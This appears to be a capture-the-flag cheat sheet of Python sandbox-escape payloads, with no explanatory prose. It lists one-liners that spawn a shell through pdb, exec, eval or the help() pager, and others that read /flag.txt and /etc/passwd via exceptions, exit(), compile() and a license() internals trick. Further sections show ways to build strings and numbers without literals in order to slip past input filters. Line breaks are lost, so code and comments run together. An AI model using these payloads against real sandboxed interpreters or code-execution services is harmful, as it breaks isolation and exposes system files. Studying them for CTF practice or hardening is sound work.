Good to know
breakpoint() # pdb -> import os; os.system("sh")exec(input()) # import os; os.system("sh")eval(input()) # __import__("os").system("sh")help() # less pager -> !/bin/shhelp() # less pager -> :e/flag.txtassert len(set( [ *open("/flag.txt"), open("/flag.txt").read(), set(open("/flag.txt")).pop() ] )) == 1# to stderrexit(set(open("/flag.txt")))exit([*open("/flag.txt")])compile(".","/flag.txt","exec")raise Exception(*open("/flag.txt"))# to stdouthelp([*open("/etc/passwd")][0]) # 1, 2, 3print(*open("/flag.txt"))type("", (), {"__init__": lambda s: print(open("flag.txt").read())})()memoryview(open("flag.txt", "rb").read()).tobytes()# to stdininput([*open("/etc/passwd")])# https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes#read-file-with-builtins-help-and-licenselicense._Printer__filenames = ['/flag.txt']; license()[license() for _ in [license._Printer__filenames in [['/flag.txt']]]]
Create char & strings
# Normalprint("hello")# hex escapesprint("\x68\x65\x6c\x6c\x6f")# octal escapesprint("\150\145\154\154\157")# unicode code pointsprint("\u0068\u0065\u006c\u006c\u006f")print("\U00000068\U00000065\U0000006c\U0000006c\U0000006f")# Only with builtinsprint(().__doc__[56] + ().__doc__[17] + ().__doc__[3] + ().__doc__[3] + ().__doc__[34])print(().__doc__[56].__add__(().__doc__[17].__add__(().__doc__[3].__add__(().__doc__[3].__add__(().__doc__[34])))))print(chr(ord('ʚ')-ord('ȫ'))+chr(ord('ř')-ord('æ'))+chr(ord('ř')-ord('æ'))+chr(ord('ȉ')-ord('ơ')))
Create digits
print(10)print(True + True + True + True + True + True + True + True + True + True)print((()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())) # work also with [] & {} & ...print(((()==())<<(()==())<<(()==())<<(()==()))|((()==())<<(()==()))) # ((1<<1<<1<<1) | (1<<1)) = 8 | 2 = 10print(len(str(...))+str(()))print([[]]>[])print(not[]is[])